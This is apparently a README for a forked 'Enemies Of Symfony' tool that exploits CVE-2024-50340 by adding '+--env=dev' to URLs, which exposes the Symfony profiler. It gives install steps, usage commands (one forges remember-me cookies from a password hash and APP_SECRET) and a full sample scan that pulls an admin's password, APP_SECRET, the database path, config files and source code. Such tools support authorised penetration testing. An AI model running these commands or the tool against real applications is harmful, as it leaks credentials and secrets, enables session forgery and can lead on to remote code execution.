When the register_argc_argv PHP directive is set to "on", CVE-2024-50340 allows attackers to force Symfony applications into the dev environment by appending ?+--env=dev to the URL.
This vulnerability enables attackers to remotely access the Symfony /_profiler in configurations where such access would typically be restricted, as the dev environment activates debugging tools by default.
Symfony's profiler is a well-known and easily exploitable debugging component, as described by Matthieu Barjole in this Synacktiv blog post:
Using this exploit, attackers can dump the application's source code, environment variables, and request logs.
If the /_fragment route is enabled, attackers can leak Symfony's APP_SECRET through the profiler's phpinfo() page and execute arbitrary code remotely, as detailed in this Ambionics blog post by Charles Fol:
This exploit is a fork of the original Synacktiv /_profiler exploit tool, modified to append +--env=dev to every URL the tool requests.
- Initial Proof of Concept (POC): https://github.com/Nyamort/CVE-2024-50340
- Vulnerability reported by Vladimir Dusheyko
- aevy-syn: Ennemies Of Symfony (EOS) author.
EOS loots information from a Symfony target in debug mode:
| Section | Description |
|---|---|
| General | Get general information about the target. |
| Phpinfo | Extract Symfony environment variables from the exposed phpinfo(). |
| Routes | Get the list of registered routes. |
| Request logs | Look for credentials in POST request logs. |
| Project files | Retrieve project files (configuration, database, etc.) based on a wordlist. |
| Sources | Extract the application source code. |
| Cookies | Craft Remember Me cookies. |
More info at https://www.synacktiv.com/posts/pentest/looting-symfony-with-eos.html.
Note that this tool does not exploit any Symfony vulnerability. The profiler is
a useful component for developers and EOS simply takes advantage on
misconfigured Symfony applications. In fact, the profiler documentation
prominently warns developers:
Never enable the profiler in production environments as it will lead to major security vulnerabilities in your project.
Thanks to all the Symfony team for their awesome work!
Tested on Python >= 3.7.
$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eosusage: eos [-h] [-V] [-v] [--no-colors] {scan,sources,get,creds,cookies} ...
███████╗ ██████╗ ███████╗
██╔════╝██╔═══██╗██╔════╝
█████╗ ██║ ██║███████╗
██╔══╝ ██║ ██║╚════██║
███████╗╚██████╔╝███████║ Enemies Of Symfony
╚══════╝ ╚═════╝ ╚══════╝ v1.1
positional arguments:
{scan,sources,get,creds,cookies}
scan perform a full scan
sources download application source code
get download a file from the application
creds extract credentials from request logs
cookies craft remember me cookies with a great lifetime
optional arguments:
-h, --help show this help message and exit
-V, --version display version info
-v, --verbose increase verbosity
--no-colors disable colors in output
examples:
eos scan http://localhost
eos scan -H 'Cookie: foo=bar; john=doe' -H 'User-Agent: EOS' http://localhost
eos get http://localhost config/services.yaml
eos cookies -u jane_admin -H '$2y$13$IMalnQpo7xfZD5FJGbEadOcqyj2mi/NQbQiI8v2wBXfjZ4nwshJlG' -s 67d829bf61dc5f87a73fd814e2c9f629$ eos scan http://localhost --output results
[+] Starting scan on http://localhost
[+] 2020-04-23 14:21:26.463352 is a great day
[+] Info
[!] Symfony 5.0.1
[!] PHP 7.3.11-1~deb10u1
[!] Environment: dev
[+] Request logs
[+] Found 9 POST requests
[!] Found the following credentials with a valid session:
[!] jane_admin: kitten [ROLE_ADMIN]
[+] Phpinfo
[+] Available at http://localhost/_profiler/phpinfo
[+] Found 101 PHP variables
[!] Found the following Symfony variables:
[!] APP_ENV: dev
[!] APP_SECRET: 67d829bf61dc5f87a73fd814e2c9f629
[!] DATABASE_URL: sqlite:///%kernel.project_dir%/data/database.sqlite
[!] MAILER_URL: null://localhost
[+] Project files
[+] Found: composer.lock, run 'symfony security:check' or submit it at https://security.symfony.com
[!] Found the following files:
[!] composer.lock
[!] composer.json
[!] config/bundles.php
[!] config/bootstrap.php
[!] config/packages/assets.yaml
[!] config/packages/cache.yaml
[!] config/packages/dev/debug.yaml
[!] config/packages/dev/monolog.yaml
[!] config/packages/dev/routing.yaml
[!] config/packages/dev/swiftmailer.yaml
[!] config/packages/dev/web_profiler.yaml
[!] config/packages/doctrine_migrations.yaml
[!] config/packages/doctrine.yaml
[!] config/packages/framework.yaml
[!] config/packages/html_sanitizer.yaml
[!] config/packages/prod/doctrine.yaml
[!] config/packages/prod/monolog.yaml
[!] config/packages/prod/routing.yaml
[!] config/packages/prod/webpack_encore.yaml
[!] config/packages/routing.yaml
[!] config/packages/security.yaml
[!] config/packages/sensio_framework_extra.yaml
[!] config/packages/swiftmailer.yaml
[!] config/packages/test/dama_doctrine_test_bundle.yaml
[!] config/packages/test/framework.yaml
[!] config/packages/test/monolog.yaml
[!] config/packages/test/routing.yaml
[!] config/packages/test/security.yaml
[!] config/packages/test/swiftmailer.yaml
[!] config/packages/test/twig.yaml
[!] config/packages/test/validator.yaml
[!] config/packages/test/webpack_encore.yaml
[!] config/packages/test/web_profiler.yaml
[!] config/packages/translation.yaml
[!] config/packages/twig.yaml
[!] config/packages/validator.yaml
[!] config/packages/webpack_encore.yaml
[!] config/routes/annotations.yaml
[!] config/routes/dev/framework.yaml
[!] config/routes/dev/web_profiler.yaml
[!] config/routes.yaml
[!] config/services.yaml
[!] data/database.sqlite
[!] data/database_test.sqlite
[!] package.json
[!] public/index.php
[!] public/robots.txt
[!] README.md
[!] src/Kernel.php
[!] symfony.lock
[!] var/cache/dev/url_generating_routes.php
[!] var/cache/dev/url_matching_routes.php
[!] var/log/dev.log
[+] Routes
[!] Found the following routes:
[!] /{_locale}/admin/post/
[!] /{_locale}/admin/post/
[!] /{_locale}/admin/post/new
[!] /{_locale}/admin/post/{id}
[!] /{_locale}/admin/post/{id}/edit
[!] /{_locale}/admin/post/{id}/delete
[!] /{_locale}/blog/
[!] /{_locale}/blog/rss.xml
[!] /{_locale}/blog/page/{page}
[!] /{_locale}/blog/posts/{slug}
[!] /{_locale}/blog/comment/{postSlug}/new
[!] /{_locale}/blog/search
[!] /{_locale}/login
[!] /{_locale}/logout
[!] /{_locale}/profile/edit
[!] /{_locale}/profile/change-password
[!] /{_locale}
[+] Project sources
[!] Found the following source files:
[!] src/Command/AddUserCommand.php
[!] src/Command/DeleteUserCommand.php
[!] src/Command/ListUsersCommand.php
[!] src/Controller/Admin/BlogController.php
[!] src/Controller/BlogController.php
[!] src/Controller/SecurityController.php
[!] src/Controller/UserController.php
[!] src/DataFixtures/AppFixtures.php
[!] src/Entity/Comment.php
[!] src/Entity/Post.php
[!] src/Entity/Tag.php
[!] src/Entity/User.php
[!] src/EventSubscriber/CheckRequirementsSubscriber.php
[!] src/EventSubscriber/CommentNotificationSubscriber.php
[!] src/EventSubscriber/ControllerSubscriber.php
[!] src/EventSubscriber/RedirectToPreferredLocaleSubscriber.php
[!] src/Events/CommentCreatedEvent.php
[!] src/Form/CommentType.php
[!] src/Form/DataTransformer/TagArrayToStringTransformer.php
[!] src/Form/PostType.php
[!] src/Form/Type/ChangePasswordType.php
[!] src/Form/Type/DateTimePickerType.php
[!] src/Form/Type/TagsInputType.php
[!] src/Form/UserType.php
[!] src/Kernel.php
[!] src/Pagination/Paginator.php
[!] src/Repository/PostRepository.php
[!] src/Repository/TagRepository.php
[!] src/Repository/UserRepository.php
[!] src/Security/PostVoter.php
[!] src/Twig/AppExtension.php
[!] src/Twig/SourceCodeExtension.php
[!] src/Utils/Markdown.php
[!] src/Utils/MomentFormatConverter.php
[!] src/Utils/Slugger.php
[!] src/Utils/Validator.php
[+] Saving files to results
[+] Saved 88 files
[+] Generated tokens: 5894a5 f68efa
[+] Scan completed in 0:00:13